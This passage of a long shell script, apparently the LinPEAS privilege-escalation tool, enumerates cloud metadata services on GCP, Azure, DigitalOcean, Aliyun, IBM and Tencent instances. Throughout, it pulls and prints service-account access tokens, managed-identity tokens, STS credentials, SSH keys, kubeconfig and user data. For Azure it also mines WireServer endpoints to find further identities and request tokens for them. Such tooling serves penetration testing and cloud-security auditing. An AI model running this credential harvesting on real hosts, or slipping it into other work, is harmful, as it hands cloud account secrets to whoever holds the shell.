metadata service :(" 5501 fi 5502 # GCP Enumeration 5503 if [ "$gcp_req" ]; then 5504 print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580" 5505 print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html" 5506 ## GC Project Info 5507 p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') 5508 [ "$p_id" ] && echo "Project-ID: $p_id" 5509 p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id') 5510 [ "$p_num" ] && echo "Project Number: $p_num" 5511 # Instance Info 5512 inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id) 5513 [ "$inst_id" ] && echo "Instance ID: $inst_id" 5514 mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration) 5515 [ "$mtls_info" ] && echo "MTLS info: $mtls_info" 5516 inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone) 5517 [ "$inst_zone" ] && echo "Zone: $inst_zone" 5518 echo "" 5519 print_3title "Service Accounts" "T1552.005,T1580" 5520 for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 5521 echo " Name: $sa" 5522 echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email") 5523 echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases") 5524 echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity") 5525 echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g" 5526 echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token") 5527 echo " ============== " 5528 done 5529 fi 5530 fi 5531 5532 fi 5533 5534 if check_mitre_filter "T1552.005,T1580"; then 5535 if [ "$is_gcp_vm" = "Yes" ]; then 5536 gcp_req="" 5537 if [ "$(command -v curl || echo -n '')" ]; then 5538 gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"' 5539 elif [ "$(command -v wget || echo -n '')" ]; then 5540 gcp_req='wget -q -O - --header "Metadata-Flavor: Google"' 5541 else 5542 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5543 fi 5544 if [ "$gcp_req" ]; then 5545 print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580" 5546 print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html" 5547 ## GC Project Info 5548 p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') 5549 [ "$p_id" ] && echo "Project-ID: $p_id" 5550 p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id') 5551 [ "$p_num" ] && echo "Project Number: $p_num" 5552 pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys') 5553 [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k" 5554 p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true') 5555 [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs" 5556 # OSLogin Info 5557 osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users) 5558 [ "$osl_u" ] && echo "OSLogin users: $osl_u" 5559 osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups) 5560 [ "$osl_g" ] && echo "OSLogin Groups: $osl_g" 5561 osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys) 5562 [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk" 5563 osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize) 5564 [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au" 5565 # Instance Info 5566 inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description) 5567 [ "$inst_d" ] && echo "Instance Description: " 5568 inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname) 5569 [ "$inst_hostn" ] && echo "Hostname: $inst_hostn" 5570 inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id) 5571 [ "$inst_id" ] && echo "Instance ID: $inst_id" 5572 inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image) 5573 [ "$inst_img" ] && echo "Instance Image: $inst_img" 5574 inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type) 5575 [ "$inst_mt" ] && echo "Machine Type: $inst_mt" 5576 inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name) 5577 [ "$inst_n" ] && echo "Instance Name: $inst_n" 5578 inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags) 5579 [ "$inst_tag" ] && echo "Instance tags: $inst_tag" 5580 inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone) 5581 [ "$inst_zone" ] && echo "Zone: $inst_zone" 5582 inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location") 5583 [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc" 5584 inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name") 5585 [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name" 5586 inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin") 5587 [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e" 5588 inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels") 5589 [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab" 5590 inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig") 5591 [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec" 5592 inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env") 5593 [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv" 5594 echo "" 5595 print_3title "Interfaces" "T1552.005,T1580" 5596 for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 5597 echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip") 5598 echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask") 5599 echo " Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway") 5600 echo " DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers") 5601 echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network") 5602 echo " ============== " 5603 done 5604 echo "" 5605 print_3title "User Data" "T1552.005,T1580" 5606 echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script") 5607 echo "" 5608 echo "" 5609 print_3title "Service Accounts" "T1552.005,T1580" 5610 for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 5611 echo " Name: $sa" 5612 echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email") 5613 echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases") 5614 echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity") 5615 echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g" 5616 echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token") 5617 echo " ============== " 5618 done 5619 fi 5620 echo "" 5621 fi 5622 5623 fi 5624 5625 if check_mitre_filter "T1552.005,T1580"; then 5626 az_vm_json_value() { 5627 if [ "$(command -v jq || echo -n '')" ]; then 5628 jq -r "$1 // empty" 2>/dev/null 5629 elif [ "$(command -v python3 || echo -n '')" ]; then 5630 python3 -c 'import json,sys 5631 obj=json.load(sys.stdin) 5632 cur=obj 5633 for p in sys.argv[1].strip(".").split("."): 5634 if not p: 5635 continue 5636 cur = cur.get(p, {}) if isinstance(cur, dict) else {} 5637 print(cur if isinstance(cur, str) else "")' "$1" 2>/dev/null 5638 else 5639 sed -n "s/.*\"$2\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p" | head -n 1 5640 fi 5641 } 5642 az_vm_request() { 5643 if [ "$(command -v curl || echo -n '')" ]; then 5644 curl -s -f -L -H "$HEADER" "$1" 2>/dev/null 5645 elif [ "$(command -v wget || echo -n '')" ]; then 5646 wget -q -O - --header "$HEADER" "$1" 2>/dev/null 5647 fi 5648 } 5649 az_vm_request_arm() { 5650 if [ "$(command -v curl || echo -n '')" ]; then 5651 curl -s -f -L -H "Authorization: Bearer $1" "$2" 2>/dev/null 5652 elif [ "$(command -v wget || echo -n '')" ]; then 5653 wget -q -O - --header "Authorization: Bearer $1" "$2" 2>/dev/null 5654 fi 5655 } 5656 az_vm_print_token() { 5657 _az_vm_token_url="$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=$2" 5658 if [ "$3" ]; then 5659 _az_vm_token_url="${_az_vm_token_url}\&$3" 5660 fi 5661 print_3title "$1" "T1552.005,T1580" 5662 exec_with_jq eval $az_req "$_az_vm_token_url" 5663 echo "" 5664 } 5665 az_vm_print_standard_tokens() { 5666 az_vm_print_token "Management token$1" "https://management.azure.com/" "$2" 5667 az_vm_print_token "Graph token$1" "https://graph.microsoft.com/" "$2" 5668 az_vm_print_token "Vault token$1" "https://vault.azure.net/" "$2" 5669 az_vm_print_token "Storage token$1" "https://storage.azure.com/" "$2" 5670 } 5671 az_vm_request_wireserver() { 5672 _az_vm_wire_header="$1" 5673 _az_vm_wire_url="$2" 5674 if [ "$(command -v curl || echo -n '')" ]; then 5675 if [ "$_az_vm_wire_header" ]; then 5676 curl -s -f -L --connect-timeout 2 --max-time 5 -H "$_az_vm_wire_header" "$_az_vm_wire_url" 2>/dev/null 5677 else 5678 curl -s -f -L --connect-timeout 2 --max-time 5 "$_az_vm_wire_url" 2>/dev/null 5679 fi 5680 elif [ "$(command -v wget || echo -n '')" ]; then 5681 if [ "$_az_vm_wire_header" ]; then 5682 wget -q -O - --timeout 5 --tries 1 --header "$_az_vm_wire_header" "$_az_vm_wire_url" 2>/dev/null 5683 else 5684 wget -q -O - --timeout 5 --tries 1 "$_az_vm_wire_url" 2>/dev/null 5685 fi 5686 fi 5687 } 5688 az_vm_try_wire_identity_tokens() { 5689 print_3title "WireServer/HostGAPlugin managed identity fallback" "T1552.005,T1580" 5690 print_info "ARM identity discovery failed. Trying WireServer GoalState, ExtensionsConfig and HostGAPlugin /vmSettings for identity-looking selectors. These endpoints are environment-dependent and may expose no managed identity data." 5691 _az_vm_wire_data="$( 5692 az_vm_request_wireserver "x-ms-version: 2012-11-30" "http://168.63.129.16/machine?comp=goalstate" 5693 az_vm_request_wireserver "x-ms-version: 2012-11-30" "http://168.63.129.16/machine/?comp=goalstate" 5694 az_vm_request_wireserver "" "http://168.63.129.16:32526/vmSettings" 5695 )" 5696 if [ "$_az_vm_wire_data" ]; then 5697 printf "%s\n" "$_az_vm_wire_data" | grep -Eio '([A-Za-z0-9_./:-]*Identity[A-Za-z0-9_./:-]*|Microsoft\.ManagedIdentity/userAssignedIdentities/[^"<>[:space:]]+|clientId["[:space:]:=]+[0-9a-fA-F-]{36}|IdentityClientId[^0-9a-fA-F]*[0-9a-fA-F-]{36})' | sort -u | head -n 80 5698 if [ "$(command -v jq || echo -n '')" ]; then 5699 printf "%s" "$_az_vm_wire_data" | jq -r '.. | objects | to_entries[]? | select((.key|test("(?i)(clientId|IdentityClientId)$")) and (.value|type=="string")) | .value' 2>/dev/null | sort -u | while read -r _az_vm_wire_client_id; do 5700 if printf "%s" "$_az_vm_wire_client_id" | grep -Eq '^[0-9a-fA-F-]{36}$'; then 5701 print_info "Trying IMDS tokens for WireServer-discovered client_id=$_az_vm_wire_client_id" 5702 az_vm_print_standard_tokens " for WireServer client_id $_az_vm_wire_client_id" "client_id=$_az_vm_wire_client_id" 5703 fi 5704 done 5705 fi 5706 printf "%s\n" "$_az_vm_wire_data" | grep -Eio '/subscriptions/[^"<>[:space:]]+/resourceGroups/[^"<>[:space:]]+/providers/Microsoft\.ManagedIdentity/userAssignedIdentities/[^"<>[:space:]]+' | sort -u | while read -r _az_vm_wire_res_id; do 5707 print_info "Trying IMDS tokens for WireServer-discovered msi_res_id=$_az_vm_wire_res_id" 5708 az_vm_print_standard_tokens " for WireServer msi_res_id" "msi_res_id=$_az_vm_wire_res_id" 5709 done 5710 else 5711 echo "WireServer/HostGAPlugin did not return data from this context." 5712 fi 5713 echo "" 5714 } 5715 if [ "$is_az_vm" = "Yes" ]; then 5716 print_2title "Azure VM Enumeration" "T1552.005,T1580" 5717 HEADER="Metadata:true" 5718 URL="http://169.254.169.254/metadata" 5719 API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions 5720 set_azure_request_command 5721 if [ "$az_req" ]; then 5722 print_3title "Instance details" "T1552.005,T1580" 5723 exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION" 5724 echo "" 5725 print_3title "Load Balancer details" "T1552.005,T1580" 5726 exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION" 5727 echo "" 5728 print_3title "User Data" "T1552.005,T1580" 5729 exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null 5730 echo "" 5731 print_3title "Custom Data and other configs (root needed)" "T1552.005,T1580" 5732 (cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED}," 5733 echo "" 5734 print_3title "Management token" "T1552.005,T1580" 5735 print_info "This is the default VM managed identity token. If several user-assigned identities exist and no system identity is present, Azure may require client_id/object_id/msi_res_id." 5736 exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/" 5737 echo "" 5738 print_3title "Graph token" "T1552.005,T1580" 5739 print_info "This is the default VM managed identity token." 5740 exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" 5741 echo "" 5742 print_3title "Vault token" "T1552.005,T1580" 5743 print_info "This is the default VM managed identity token." 5744 exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/" 5745 echo "" 5746 print_3title "Storage token" "T1552.005,T1580" 5747 print_info "This is the default VM managed identity token." 5748 exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/" 5749 echo "" 5750 print_3title "Attached user-assigned managed identities and tokens" "T1552.005,T1580" 5751 print_info "LinPEAS tries to discover all attached UAIs by using the default Management token to read the VM ARM identity block. If that token cannot read Microsoft.Compute/virtualMachines/read, IMDS can still issue tokens for known client_id/object_id/msi_res_id values, but the full attached identity list cannot be discovered from IMDS alone." 5752 _az_vm_instance_json="$(az_vm_request "$URL/instance?api-version=$API_VERSION")" 5753 _az_vm_resource_id="$(printf "%s" "$_az_vm_instance_json" | az_vm_json_value ".compute.resourceId" "resourceId")" 5754 _az_vm_mgmt_token_json="$(az_vm_request "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/")" 5755 _az_vm_mgmt_token="$(printf "%s" "$_az_vm_mgmt_token_json" | az_vm_json_value ".access_token" "access_token")" 5756 if [ "$_az_vm_resource_id" ] && [ "$_az_vm_mgmt_token" ]; then 5757 _az_vm_arm_json="$(az_vm_request_arm "$_az_vm_mgmt_token" "https://management.azure.com${_az_vm_resource_id}?api-version=2024-07-01")" 5758 if printf "%s" "$_az_vm_arm_json" | grep -q '"userAssignedIdentities"'; then 5759 if [ "$(command -v jq || echo -n '')" ]; then 5760 printf "%s" "$_az_vm_arm_json" | jq '.identity' 5761 printf "%s" "$_az_vm_arm_json" | jq -r '.identity.userAssignedIdentities // {} | to_entries[] | [.key, .value.clientId, .value.principalId] | @tsv' 2>/dev/null | while IFS="$(printf '\t')" read -r _az_vm_uai_id _az_vm_uai_client_id _az_vm_uai_principal_id; do 5762 if [ "$_az_vm_uai_client_id" ]; then 5763 print_info "Requesting tokens for UAI client_id=$_az_vm_uai_client_id principal_id=$_az_vm_uai_principal_id resource_id=$_az_vm_uai_id" 5764 az_vm_print_standard_tokens " for UAI $_az_vm_uai_client_id" "client_id=$_az_vm_uai_client_id" 5765 fi 5766 done 5767 else 5768 echo "$_az_vm_arm_json" | sed "s,access_token,${SED_RED},g" 5769 print_info "Install jq to parse all attached user-assigned identities and request tokens for each one automatically." 5770 az_vm_try_wire_identity_tokens 5771 fi 5772 else 5773 echo "Could not read attached user-assigned identities from ARM with the default managed identity token." 5774 az_vm_try_wire_identity_tokens 5775 fi 5776 else 5777 echo "Could not obtain the VM resource ID or default Management token needed for ARM identity discovery." 5778 az_vm_try_wire_identity_tokens 5779 fi 5780 echo "" 5781 fi 5782 echo "" 5783 fi 5784 5785 fi 5786 5787 if check_mitre_filter "T1552.005,T1580"; then 5788 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp 5789 if [ "$is_az_app" = "Yes" ]; then 5790 print_2title "Azure App Service Enumeration" "T1552.005,T1580" 5791 HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER" 5792 set_azure_request_command 5793 if [ "$az_req" ]; then 5794 print_azure_standard_identity_tokens 5795 fi 5796 echo "" 5797 fi 5798 5799 fi 5800 5801 if check_mitre_filter "T1552.005,T1580"; then 5802 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp 5803 if [ "$is_az_automation_acc" = "Yes" ]; then 5804 print_2title "Azure Automation Account Service Enumeration" "T1552.005,T1580" 5805 HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER" 5806 set_azure_request_command 5807 if [ "$az_req" ]; then 5808 print_azure_standard_identity_tokens 5809 fi 5810 echo "" 5811 fi 5812 5813 fi 5814 5815 if check_mitre_filter "T1552.005,T1580"; then 5816 if [ "$is_do" = "Yes" ]; then 5817 print_2title "DO Droplet Enumeration" "T1552.005,T1580" 5818 do_req="" 5819 if [ "$(command -v curl || echo -n '')" ]; then 5820 do_req='curl -s -f -L ' 5821 elif [ "$(command -v wget || echo -n '')" ]; then 5822 do_req='wget -q -O - ' 5823 else 5824 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5825 fi 5826 if [ "$do_req" ]; then 5827 URL="http://169.254.169.254/metadata" 5828 printf "Id: "; eval $do_req "$URL/v1/id"; echo "" 5829 printf "Region: "; eval $do_req "$URL/v1/region"; echo "" 5830 printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo "" 5831 printf "User data: "; eval $do_req "$URL/v1/user-data"; echo "" 5832 printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo "" 5833 printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces"; 5834 printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip"; 5835 printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip"; 5836 printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags"; 5837 printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features"; 5838 fi 5839 echo "" 5840 fi 5841 5842 fi 5843 5844 if check_mitre_filter "T1552.005,T1580"; then 5845 if [ "$is_aliyun_ecs" = "Yes" ]; then 5846 aliyun_req="" 5847 aliyun_token="" 5848 if [ "$(command -v curl)" ]; then 5849 aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000") 5850 aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"' 5851 elif [ "$(command -v wget)" ]; then 5852 aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000") 5853 aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"' 5854 else 5855 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5856 fi 5857 if [ "$aliyun_token" ]; then 5858 print_2title "Aliyun ECS Enumeration" "T1552.005,T1580" 5859 print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata" 5860 echo "" 5861 print_3title "Instance Info" "T1552.005,T1580" 5862 i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname) 5863 [ "$i_hostname" ] && echo "Hostname: $i_hostname" 5864 i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id) 5865 [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id" 5866 # no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId 5867 i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name) 5868 [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name" 5869 i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type) 5870 [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type" 5871 i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id) 5872 [ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account" 5873 i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id) 5874 [ "$i_region_id" ] && echo "Region ID: $i_region_id" 5875 i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id) 5876 [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id" 5877 echo "" 5878 print_3title "Network Info" "T1552.005,T1580" 5879 i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4) 5880 [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4" 5881 i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4) 5882 [ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4" 5883 net_dns=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/dns-conf/nameservers) 5884 [ "$net_dns" ] && echo "DNS: $net_dns" 5885 echo "========" 5886 for mac in $(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do 5887 echo " Mac: $mac" 5888 echo " Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id) 5889 echo " Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask) 5890 echo " Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id) 5891 echo " Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block) 5892 echo " Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks) 5893 echo " Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id) 5894 echo " Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block) 5895 echo " Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block) 5896 echo " Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s) 5897 echo " Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s) 5898 echo " Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway) 5899 echo " Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway) 5900 echo "=======" 5901 done 5902 echo "" 5903 print_3title "Service account " "T1552.005,T1580" 5904 for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do 5905 echo " Name: $sa" 5906 echo " STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa") 5907 echo " ==============" 5908 done 5909 echo "" 5910 print_3title "Possbile admin ssh Public keys" "T1552.005,T1580" 5911 for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do 5912 echo " Name: $key" 5913 echo " Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key") 5914 echo " ==============" 5915 done 5916 fi 5917 fi 5918 5919 fi 5920 5921 if check_mitre_filter "T1552.005,T1580"; then 5922 if [ "$is_ibm_vm" = "Yes" ]; then 5923 print_2title "IBM Cloud Enumeration" "T1552.005,T1580" 5924 if ! [ "$IBM_TOKEN" ]; then 5925 echo "Couldn't get the metadata token:(" 5926 else 5927 TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" 5928 ACCEPT_HEADER="Accept: application/json" 5929 URL="http://169.254.169.254/latest/meta-data" 5930 ibm_req="" 5931 if [ "$(command -v curl || echo -n '')" ]; then 5932 ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" 5933 elif [ "$(command -v wget || echo -n '')" ]; then 5934 ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" 5935 else 5936 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5937 fi 5938 if [ "$ibm_req" ]; then 5939 print_3title "Instance Details" "T1552.005,T1580" 5940 exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" 5941 print_3title "Keys and User data" "T1552.005,T1580" 5942 exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" 5943 exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" 5944 print_3title "Placement Groups" "T1552.005,T1580" 5945 exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" 5946 print_3title "IAM credentials" "T1552.005,T1580" 5947 exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" 5948 fi 5949 fi 5950 echo "" 5951 fi 5952 5953 fi 5954 5955 if check_mitre_filter "T1552.005,T1580"; then 5956 if [ "$is_tencent_cvm" = "Yes" ]; then 5957 tencent_req="" 5958 if [ "$(command -v curl)" ]; then 5959 tencent_req='curl --connect-timeout 2 -sfkG' 5960 elif [ "$(command -v wget)" ]; then 5961 tencent_req='wget -q --timeout 2 --tries 1 -O -' 5962 else 5963 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 5964 fi 5965 print_2title "Tencent CVM Enumeration" "T1552.005,T1580" 5966 print_info "https://cloud.tencent.com/document/product/213/4934" 5967 # Todo: print_info "Hacktricks Documents needs to be updated" 5968 echo "" 5969 print_3title "Instance Info" "T1552.005,T1580" 5970 i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id) 5971 [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account" 5972 i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname) 5973 [ "$i_hostname" ] && echo "Hostname: $i_hostname" 5974 i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id) 5975 [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id" 5976 i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid) 5977 [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id" 5978 i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name) 5979 [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name" 5980 i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type) 5981 [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type" 5982 i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region) 5983 [ "$i_region_id" ] && echo "Region ID: $i_region_id" 5984 i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone) 5985 [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id" 5986 echo "" 5987 print_3title "Network Info" "T1552.005,T1580" 5988 for 